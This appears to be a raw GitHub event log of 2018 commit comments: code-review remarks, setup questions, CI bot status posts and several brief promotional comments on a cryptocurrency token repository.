{"id":"8008754780","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29811068,"position":3,"line":3,"path":"src/io/jiyuujin/java/day22/Person.java","commit_id":"6b4ce3484db34684268fbc677a55bd06fc72eefe","created_at":"2018-07-24T08:54:29Z","updated_at":"2018-07-24T08:54:29Z","author_association":"COLLABORATOR","body":"前の Character クラスをEnemyクラスにして追加してPersonクラスみたいに操作してみて"}},"created_at":"2018-07-24T08:54:29Z"}
{"id":"8008755600","type":"CommitCommentEvent","actor":{"login":"Yidnekachew"},"repo":{"name":"opencog/as-moses"},"payload":{"comment":{"id":29811070,"position":null,"line":null,"path":null,"commit_id":"e3bedc90c7a82db8fe338a3da2f05d0af7cf9f03","created_at":"2018-07-24T08:54:39Z","updated_at":"2018-07-24T08:54:39Z","author_association":"COLLABORATOR","body":"As per #21."}},"created_at":"2018-07-24T08:54:39Z"}
{"id":"8008756671","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29811071,"position":212,"line":406,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T08:54:50Z","updated_at":"2018-07-24T08:54:50Z","author_association":"NONE","body":"mtu is always configured. Default MTU value can be taken from p-port as MAC address, so I think flag \"mtu_configured\" is unneded."}},"created_at":"2018-07-24T08:54:50Z"}
{"id":"8008758552","type":"CommitCommentEvent","actor":{"login":"Yidnekachew"},"repo":{"name":"opencog/as-moses"},"payload":{"comment":{"id":29811073,"position":null,"line":null,"path":null,"commit_id":"e3bedc90c7a82db8fe338a3da2f05d0af7cf9f03","created_at":"2018-07-24T08:55:11Z","updated_at":"2018-07-24T08:55:11Z","author_association":"COLLABORATOR","body":"Nil said:\r\n\r\n> I don't think you need to bother with that for now, simply convert the reduced combo program to atomese, using the code in https://github.com/opencog/as-moses/blob/master/moses/comboreduct/converter/combo_atomese.h\r\n\r\n> That is, as you implement the atomese_based_scorer convert the combo tree to atomese, that combo tree will likely already be reduced (depending on the parameters) and that's all your need. Reread carefully Section Replace Combo by Atomese Interpreter in Fitness Evaluation of issue #3 that should hopefully be clear (let me know otherwise)."}},"created_at":"2018-07-24T08:55:11Z"}
{"id":"8008760576","type":"CommitCommentEvent","actor":{"login":"hongcaihao"},"repo":{"name":"hideakitai/ofxModbusOriental"},"payload":{"comment":{"id":29811075,"position":null,"line":null,"path":null,"commit_id":"bd29987b5af36d6dcd156ae78051b88e6f06c784","created_at":"2018-07-24T08:55:33Z","updated_at":"2018-07-24T08:55:33Z","author_association":"NONE","body":"Which type  oriental motor  you wanna contorl with this code ??"}},"created_at":"2018-07-24T08:55:33Z"}
{"id":"8008762620","type":"CommitCommentEvent","actor":{"login":"NovaRain"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29811077,"position":15,"line":567,"path":"artifacts/ddraw.ini","commit_id":"44d668f50b66530d458c2e405b1c60e0c727fe24","created_at":"2018-07-24T08:55:57Z","updated_at":"2018-07-24T08:55:57Z","author_association":"COLLABORATOR","body":">'filename : number' w/o whitespaces!\r\n\r\nIt was written in the same way as CityRepsList above."}},"created_at":"2018-07-24T08:55:57Z"}
{"id":"8008764291","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29811082,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T08:56:16Z","updated_at":"2018-07-24T08:56:16Z","author_association":"NONE","body":"Hi,\r\n\r\nI have a confusion that I wanted to clear. \r\n\r\nWhy are \"background\" and \"system-background\" CPU-Sets limited to 0-1 and 0-3 respectively? These are background processes so shouldn't they be placed on LITTLE Cluster instead of big? \r\n\r\nThanks!"}},"created_at":"2018-07-24T08:56:16Z"}
{"id":"8008767211","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29811092,"position":null,"line":null,"path":null,"commit_id":"27fa0ac209e3dda6be48169694e2e9c3cad9fa78","created_at":"2018-07-24T08:56:47Z","updated_at":"2018-07-24T08:56:47Z","author_association":"CONTRIBUTOR","body":"@FredKruse , works perfectly. Thank you."}},"created_at":"2018-07-24T08:56:47Z"}
{"id":"8008772099","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29811099,"position":null,"line":null,"path":null,"commit_id":"48202596cd38b37c2304ed87c37e5a6142992058","created_at":"2018-07-24T08:57:42Z","updated_at":"2018-07-24T08:57:42Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T08:57:42Z"}
{"id":"8008774142","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29811101,"position":255,"line":441,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T08:58:04Z","updated_at":"2018-07-24T08:58:04Z","author_association":"NONE","body":"You really don't need to check pkt_size vs MTU in the driver. Application or network stack must do it before call driver.\r\nYou can leave the check in debug mode, but no need to drop packet for that."}},"created_at":"2018-07-24T08:58:04Z"}
{"id":"8008774673","type":"CommitCommentEvent","actor":{"login":"karkanpolees134679"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811103,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:58:11Z","updated_at":"2018-07-24T08:58:11Z","author_association":"NONE","body":"Good profect"}},"created_at":"2018-07-24T08:58:11Z"}
{"id":"8008776027","type":"CommitCommentEvent","actor":{"login":"joshuous"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29811106,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T08:58:24Z","updated_at":"2018-07-24T08:58:24Z","author_association":"MEMBER","body":"@Shoaib0597, this is for msm8998 tuning. Hence 8 cores, instead of 4 cores"}},"created_at":"2018-07-24T08:58:24Z"}
{"id":"8008778738","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29811109,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T08:58:53Z","updated_at":"2018-07-24T08:58:53Z","author_association":"CONTRIBUTOR","body":"Anything that work is fine, I introduce and pushed Nancy because no one cared enough to find cross platform framework for Service that we needed :-) glad there is something new coming. Any ETA because I see that max work have stopped (I hope not), and something fresh would lift this project. "}},"created_at":"2018-07-24T08:58:53Z"}
{"id":"8008781538","type":"CommitCommentEvent","actor":{"login":"coder1boy"},"repo":{"name":"coder1boy/hello-world"},"payload":{"comment":{"id":29811112,"position":1,"line":1,"path":"README.md","commit_id":"ebed0702ae4888327a1ba9832fce7ada69664bdd","created_at":"2018-07-24T08:59:23Z","updated_at":"2018-07-24T08:59:23Z","author_association":"OWNER","body":"hi skdlas"}},"created_at":"2018-07-24T08:59:23Z"}
{"id":"8008784062","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29811118,"position":5,"line":16,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-24T08:59:50Z","updated_at":"2018-07-24T08:59:50Z","author_association":"CONTRIBUTOR","body":"Leave it as is."}},"created_at":"2018-07-24T08:59:50Z"}
{"id":"8008785248","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811125,"position":28,"line":9,"path":"order/models.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:00:03Z","updated_at":"2018-07-24T09:00:03Z","author_association":"NONE","body":"тут можно просто User. так как у тебя идет get_user_model"}},"created_at":"2018-07-24T09:00:03Z"}
{"id":"8008789775","type":"CommitCommentEvent","actor":{"login":"TySonTian"},"repo":{"name":"sgossel1/eleven-eighteen-ent"},"payload":{"comment":{"id":29811144,"position":null,"line":null,"path":null,"commit_id":"35e16a4f0bec13b396f031e08e39ba6d85dab823","created_at":"2018-07-24T09:00:48Z","updated_at":"2018-07-24T09:00:48Z","author_association":"NONE","body":"Very Eell！"}},"created_at":"2018-07-24T09:00:48Z"}
{"id":"8008792387","type":"CommitCommentEvent","actor":{"login":"martinezjavier"},"repo":{"name":"dracutdevs/dracut"},"payload":{"comment":{"id":29811148,"position":176,"line":532,"path":"dracut.spec","commit_id":"0bb9a683d4df27427a0ab1d247b6dbb8343d820e","created_at":"2018-07-24T09:01:16Z","updated_at":"2018-07-24T09:01:16Z","author_association":"CONTRIBUTOR","body":"@lnykryn dropping this script caused a regression on Fedora, please take a look to https://bugzilla.redhat.com/show_bug.cgi?id=1581478 (cc @haraldh)."}},"created_at":"2018-07-24T09:01:16Z"}
{"id":"8008794889","type":"CommitCommentEvent","actor":{"login":"AnjithaJohnson"},"repo":{"name":"nileenamartha/Blood-Donation-Information-System"},"payload":{"comment":{"id":29811153,"position":null,"line":null,"path":null,"commit_id":"96bcbdd50777683b1e73bfcf07ba806bbed2f771","created_at":"2018-07-24T09:01:44Z","updated_at":"2018-07-24T09:01:44Z","author_association":"COLLABORATOR","body":"added fb,edit and search"}},"created_at":"2018-07-24T09:01:44Z"}
{"id":"8008797324","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29811156,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-24T09:02:09Z","updated_at":"2018-07-24T09:02:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T09:02:09Z"}
{"id":"8008797726","type":"CommitCommentEvent","actor":{"login":"Mishti123"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811159,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:02:13Z","updated_at":"2018-07-24T09:02:13Z","author_association":"NONE","body":"big project"}},"created_at":"2018-07-24T09:02:13Z"}
{"id":"8008799288","type":"CommitCommentEvent","actor":{"login":"Maikuolan"},"repo":{"name":"phpearth/docker-php"},"payload":{"comment":{"id":29811164,"position":null,"line":null,"path":null,"commit_id":"f03e4fa075564a133c233aa6268de9ecb07356f8","created_at":"2018-07-24T09:02:29Z","updated_at":"2018-07-24T09:02:29Z","author_association":"MEMBER","body":"🎉"}},"created_at":"2018-07-24T09:02:29Z"}
{"id":"8008799865","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29811165,"position":239,"line":181,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-24T09:02:35Z","updated_at":"2018-07-24T09:02:35Z","author_association":"CONTRIBUTOR","body":"The lack of any `#` indicates that, but I'm not that bothered. It just looks weird because it wasn't there before the migration."}},"created_at":"2018-07-24T09:02:35Z"}
{"id":"8008801200","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811166,"position":7,"line":7,"path":"order/permissions.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:02:49Z","updated_at":"2018-07-24T09:02:49Z","author_association":"NONE","body":"А если просто убрать \"GET\" из списка???"}},"created_at":"2018-07-24T09:02:49Z"}
{"id":"8008801259","type":"CommitCommentEvent","actor":{"login":"iainx"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29811167,"position":23,"line":183,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Ide.StatusService/StatusMessageContext.cs","commit_id":"62bd02abd135efc3e332dedb97a56099fe6cd0ab","created_at":"2018-07-24T09:02:50Z","updated_at":"2018-07-24T09:02:50Z","author_association":"MEMBER","body":"Me neither"}},"created_at":"2018-07-24T09:02:50Z"}
{"id":"8008802248","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29811169,"position":180,"line":382,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T09:03:00Z","updated_at":"2018-07-24T09:03:00Z","author_association":"NONE","body":"You must check pointer returned by rte_pktmbuf_prepend. \r\nIf NULL returned, no place in the mbuf to add bytes."}},"created_at":"2018-07-24T09:03:00Z"}
{"id":"8008806047","type":"CommitCommentEvent","actor":{"login":"Ash258"},"repo":{"name":"Ash258/scoop-Ash258"},"payload":{"comment":{"id":29811177,"position":null,"line":null,"path":null,"commit_id":"2b84f950610a52a4af9bce7e1f2fd23a947ed3ca","created_at":"2018-07-24T09:03:39Z","updated_at":"2018-07-24T09:03:39Z","author_association":"OWNER","body":"Progress on #4 "}},"created_at":"2018-07-24T09:03:39Z"}
{"id":"8008806607","type":"CommitCommentEvent","actor":{"login":"zhangxingbaowz"},"repo":{"name":"binbindream/paigong"},"payload":{"comment":{"id":29811182,"position":9,"line":9,"path":"zhangxingbao.php","commit_id":"f87a8f7c26c76c623ee32c506cda38b84e3f332f","created_at":"2018-07-24T09:03:44Z","updated_at":"2018-07-24T09:03:44Z","author_association":"CONTRIBUTOR","body":"不知道是啥情况，咋整啊"}},"created_at":"2018-07-24T09:03:44Z"}
{"id":"8008808225","type":"CommitCommentEvent","actor":{"login":"Khushbudhyana"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811184,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:04:00Z","updated_at":"2018-07-24T09:04:00Z","author_association":"NONE","body":"Very nice Project!!!"}},"created_at":"2018-07-24T09:04:00Z"}
{"id":"8008808957","type":"CommitCommentEvent","actor":{"login":"anitaSpatil"},"repo":{"name":"tinyos/tinyos-main"},"payload":{"comment":{"id":29811185,"position":null,"line":null,"path":null,"commit_id":"ad056121cc51c449d6de154d98604e2c167dbfd8","created_at":"2018-07-24T09:04:08Z","updated_at":"2018-07-24T09:04:08Z","author_association":"NONE","body":"Dear Sir,\nThanks a lot for your response.\n\nComplete means-\n\n\n*For TinyOS with old Make version of 2004 the confusions are like*\nIf I am not getting Yeti2 plugins then how to set-up the development\nenvironment for TinyOS application execution on eclipse?\nOR\nAre there any other methods to run TinyOS applications without eclipse i.e\ndirectly on terminal or simulator?\n\n\n*For TinyOS with new Make version 3 where all the installation changes?*\n\n\nThanking you\nAnita S Patil\n\nOn Tue, Jul 24, 2018 at 1:13 PM, Eric Decker <notifications@github.com>\nwrote:\n\n> what does complete mean?\n>\n> by that what are you expecting when installing TinyOS on Ubuntu 18.04?\n>\n>\n> On Fri, Jul 6, 2018 at 12:19 AM, anitaSpatil <notifications@github.com>\n> wrote:\n>\n> > Dear Sir,\n> > Earlier around a year back I installed TinyOS-2.1.2 along with Eclipse\n> and\n> > supporting Yeti 2 plugins, But now I am not getting Yeti 2 as well\n> ashttp:\n> > //tinyos.net website. As I can see now there is a new version 3, Please\n> > guide me how to install the complete TinyOS on Ubuntu 18.04 LTS.\n> >\n> > Thanking you\n> > Anita S Patil\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/tinyos/tinyos-main/commit/\n> ad056121cc51c449d6de154d98604e2c167dbfd8#commitcomment-29617449>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AAY46YtZdq1TO9LO65fTnrhTDtb65mEeks5uDw9tgaJpZM4VE_tW>\n> > .\n> >\n>\n>\n>\n> --\n> Eric B. Decker\n> Senior (over 50 :-) Researcher\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tinyos/tinyos-main/commit/ad056121cc51c449d6de154d98604e2c167dbfd8#commitcomment-29810242>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVwh9LQaDrG7GUlewGa5TRxVOcBJ7O-Oks5uJtAvgaJpZM4VE_tW>\n> .\n>\n"}},"created_at":"2018-07-24T09:04:08Z"}
{"id":"8008809819","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29811186,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T09:04:17Z","updated_at":"2018-07-24T09:04:17Z","author_association":"NONE","body":"@joshuous Oh, so the numbering is inverse in CPU-Sets? Like 0-3 are LITTLE and 4-7 are big?"}},"created_at":"2018-07-24T09:04:17Z"}
{"id":"8008812018","type":"CommitCommentEvent","actor":{"login":"memoteto"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811188,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:04:39Z","updated_at":"2018-07-24T09:04:39Z","author_association":"NONE","body":"What a absolutely awesome project brilliant idea\r\n\r\n"}},"created_at":"2018-07-24T09:04:39Z"}
{"id":"8008812205","type":"CommitCommentEvent","actor":{"login":"apeteri"},"repo":{"name":"b2ihealthcare/snow-owl"},"payload":{"comment":{"id":29811189,"position":26,"line":402,"path":"snomed/com.b2international.snowowl.snomed.datastore/src/com/b2international/snowowl/snomed/datastore/request/rf2/SnomedRf2ExportRequest.java","commit_id":"a72d8e6a4ad8e90bb2c8a1bab3f397c7a1c117d8","created_at":"2018-07-24T09:04:41Z","updated_at":"2018-07-24T09:04:41Z","author_association":"MEMBER","body":"If you want to ensure a fixed iteration (stream encounter) order, use `forEachOrdered`. In this particular case, there is no real difference because a sequential stream is created three lines above. https://stackoverflow.com/questions/32797579/foreach-vs-foreachordered-in-java-8-stream"}},"created_at":"2018-07-24T09:04:41Z"}
{"id":"8008816265","type":"CommitCommentEvent","actor":{"login":"joshuous"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29811194,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T09:05:21Z","updated_at":"2018-07-24T09:05:21Z","author_association":"MEMBER","body":"@Shoaib0597 it is inverse relative to what you were thinking. Yes that configuration is correct"}},"created_at":"2018-07-24T09:05:21Z"}
{"id":"8008818047","type":"CommitCommentEvent","actor":{"login":"hideakitai"},"repo":{"name":"hideakitai/ofxModbusOriental"},"payload":{"comment":{"id":29811197,"position":null,"line":null,"path":null,"commit_id":"bd29987b5af36d6dcd156ae78051b88e6f06c784","created_at":"2018-07-24T09:05:39Z","updated_at":"2018-07-24T09:05:39Z","author_association":"OWNER","body":"tested on AZ series"}},"created_at":"2018-07-24T09:05:39Z"}
{"id":"8008819539","type":"CommitCommentEvent","actor":{"login":"PatriotCodes"},"repo":{"name":"FantAsylum/RGBot"},"payload":{"comment":{"id":29811198,"position":null,"line":null,"path":null,"commit_id":"a541c7ce5995a913e7f6061b5c683fc350ea1f7d","created_at":"2018-07-24T09:05:55Z","updated_at":"2018-07-24T09:05:55Z","author_association":"MEMBER","body":"Красава)"}},"created_at":"2018-07-24T09:05:55Z"}
{"id":"8008821413","type":"CommitCommentEvent","actor":{"login":"leovilok"},"repo":{"name":"kouchy/teeworlds"},"payload":{"comment":{"id":29811204,"position":null,"line":null,"path":null,"commit_id":"169564cec1fefbc47dfc0294f56bfcc176b684dd","created_at":"2018-07-24T09:06:16Z","updated_at":"2018-07-24T09:06:16Z","author_association":"COLLABORATOR","body":"Effectivement c'est pour faire une carte des kills (voir le site). Je pense qu'en daily on aura pas de problèmes de taille. Au bout d'un moment ça pourrait poser des problèmes en global, si c'est le cas on pourra simplement éviter de les fusionner."}},"created_at":"2018-07-24T09:06:16Z"}
{"id":"8008821945","type":"CommitCommentEvent","actor":{"login":"danibeni"},"repo":{"name":"SCADA-LTS/Scada-LTS"},"payload":{"comment":{"id":29811206,"position":null,"line":null,"path":null,"commit_id":"51d086d6194edd402cd087de348b74d9f26f7019","created_at":"2018-07-24T09:06:21Z","updated_at":"2018-07-24T09:06:21Z","author_association":"NONE","body":"The link to the website is incorrect. I suppose that the intention is to put only http//scada-lts.com/#support"}},"created_at":"2018-07-24T09:06:21Z"}
{"id":"8008824356","type":"CommitCommentEvent","actor":{"login":"Shoaib0597"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29811215,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T09:06:45Z","updated_at":"2018-07-24T09:06:45Z","author_association":"NONE","body":"@joshuous So, these values should be fine for MSM8937 too? I have a device with this SoC. BTW, thanks for the quick info!"}},"created_at":"2018-07-24T09:06:45Z"}
{"id":"8008827942","type":"CommitCommentEvent","actor":{"login":"danieledb"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811221,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:07:24Z","updated_at":"2018-07-24T09:07:24Z","author_association":"NONE","body":"very interesting project, great job to make contract open!"}},"created_at":"2018-07-24T09:07:24Z"}
{"id":"8008829122","type":"CommitCommentEvent","actor":{"login":"emmenlau"},"repo":{"name":"zeux/pugixml"},"payload":{"comment":{"id":29811225,"position":null,"line":null,"path":null,"commit_id":"f3139f4c0487a7455d66d4dcd3b0aab3d54c63d1","created_at":"2018-07-24T09:07:37Z","updated_at":"2018-07-24T09:07:37Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-24T09:07:37Z"}
{"id":"8008830351","type":"CommitCommentEvent","actor":{"login":"princesataotpersiq"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811230,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:07:51Z","updated_at":"2018-07-24T09:07:51Z","author_association":"NONE","body":"great job!!!"}},"created_at":"2018-07-24T09:07:51Z"}
{"id":"8008831819","type":"CommitCommentEvent","actor":{"login":"rmehner"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29811234,"position":null,"line":null,"path":null,"commit_id":"046ec5e77094877b1afe7bae3b8c06e1ef011436","created_at":"2018-07-24T09:08:08Z","updated_at":"2018-07-24T09:08:08Z","author_association":"NONE","body":"@ai thanks for the clarification. I saw that this is only related to tests, but wanted to make sure I didn't miss any big Sprockets 3 vs. 4 news :)\r\n\r\nThanks again and have a great day!"}},"created_at":"2018-07-24T09:08:08Z"}
{"id":"8008832221","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29811236,"position":null,"line":null,"path":null,"commit_id":"fac470014b4b97060a22c346aadfaf9c03b99ff2","created_at":"2018-07-24T09:08:12Z","updated_at":"2018-07-24T09:08:12Z","author_association":"MEMBER","body":"Just a thought: is there a case when the creature is from another map ?"}},"created_at":"2018-07-24T09:08:12Z"}
{"id":"8008833932","type":"CommitCommentEvent","actor":{"login":"xfq"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":29811243,"position":null,"line":null,"path":null,"commit_id":"2c79a766227c4dfc7a3e8c3ef2fa11af393c88a3","created_at":"2018-07-24T09:08:31Z","updated_at":"2018-07-24T09:08:31Z","author_association":"CONTRIBUTOR","body":"@tabatkins What about wrapping this in an `a` element, so that users won't need to copy and paste the link to the address bar?"}},"created_at":"2018-07-24T09:08:31Z"}
{"id":"8008834500","type":"CommitCommentEvent","actor":{"login":"Fray23"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29811244,"position":7,"line":7,"path":"order/permissions.py","commit_id":"ccd31d49389e46d9c9dba12d2dee5c9d680fd785","created_at":"2018-07-24T09:08:37Z","updated_at":"2018-07-24T09:08:37Z","author_association":"OWNER","body":"зачем его убирать ?, ведь ели убрать \"GET\" заказчик потеряет возможность просматреть собственный заказ  "}},"created_at":"2018-07-24T09:08:37Z"}
{"id":"8008836167","type":"CommitCommentEvent","actor":{"login":"NRJ2"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811250,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:08:56Z","updated_at":"2018-07-24T09:08:56Z","author_association":"NONE","body":"Nice Project"}},"created_at":"2018-07-24T09:08:56Z"}
{"id":"8008841250","type":"CommitCommentEvent","actor":{"login":"QUANGKHANH140377"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811264,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:09:56Z","updated_at":"2018-07-24T09:09:56Z","author_association":"NONE","body":"Follow and join airdrop campaign\r\n"}},"created_at":"2018-07-24T09:09:56Z"}
{"id":"8008842125","type":"CommitCommentEvent","actor":{"login":"bestercoin"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29811268,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T09:10:06Z","updated_at":"2018-07-24T09:10:06Z","author_association":"NONE","body":"gutes Projekt"}},"created_at":"2018-07-24T09:10:06Z"}
{"id":"8008844526","type":"CommitCommentEvent","actor":{"login":"Hikari-no-Tenshi"},"repo":{"name":"LineageOS-eXtended/android_frameworks_base"},"payload":{"comment":{"id":29811276,"position":null,"line":null,"path":null,"commit_id":"00efcf5d8251ef94c44be1f94c1d8c7f4857ac2c","created_at":"2018-07-24T09:10:32Z","updated_at":"2018-07-24T09:10:32Z","author_association":"NONE","body":"I will not add this. Other ways to make screenshot working better."}},"created_at":"2018-07-24T09:10:32Z"}
{"id":"8008847887","type":"CommitCommentEvent","actor":{"login":"svenschwermer"},"repo":{"name":"google/periph"},"payload":{"comment":{"id":29811280,"position":null,"line":null,"path":null,"commit_id":"efe6fe1a0a43d65b02129dfede1a25f045f98477","created_at":"2018-07-24T09:11:08Z","updated_at":"2018-07-24T09:11:08Z","author_association":"NONE","body":"@maruel I don't think naming the file `ioctl_mips.go` and using `+build mips mipsle` will work. In a quick test I did, the `ioctl_mips.go` file was not built with `GOARCH=mipsle`. Also, there is a typo in `+build !mips,!mipsel`.\r\n\r\nOther than that, I have to say that this is pretty nasty bit-juggling, but if you want to keep the API of `Ioctl` that's pretty much the only option."}},"created_at":"2018-07-24T09:11:08Z"}
{"id":"8008860789","type":"CommitCommentEvent","actor":{"login":"oleorhagen"},"repo":{"name":"mirzak/mender"},"payload":{"comment":{"id":29811301,"position":null,"line":null,"path":null,"commit_id":"3349a68d6b851eb006b855fc441150ffefcf751a","created_at":"2018-07-24T09:13:26Z","updated_at":"2018-07-24T09:13:26Z","author_association":"NONE","body":"s/determain/determine\r\nAlso, I think the return is supposed to be in an if, no?\r\nWhat is the downside of not probing?\r\n\r\n"}},"created_at":"2018-07-24T09:13:26Z"}
{"id":"8008861624","type":"CommitCommentEvent","actor":{"login":"enachescurobert"},"repo":{"name":"enachescurobert/Test0"},"payload":{"comment":{"id":29811302,"position":null,"line":null,"path":null,"commit_id":"20d5ba2dd935811ece9bb34443b3c9452f84e51e","created_at":"2018-07-24T09:13:35Z","updated_at":"2018-07-24T09:13:35Z","author_association":"OWNER","body":"sdasdasdasd"}},"created_at":"2018-07-24T09:13:35Z"}
{"id":"8008865797","type":"CommitCommentEvent","actor":{"login":"FreeGamingHere"},"repo":{"name":"CubePM/MysteryBox"},"payload":{"comment":{"id":29811309,"position":5,"line":18,"path":"README.md","commit_id":"ceedb7f8a8b5bd0bd911a6db6cd4fb651dfba8dd","created_at":"2018-07-24T09:14:21Z","updated_at":"2018-07-24T09:14:21Z","author_association":"NONE","body":"Customizable*"}},"created_at":"2018-07-24T09:14:21Z"}
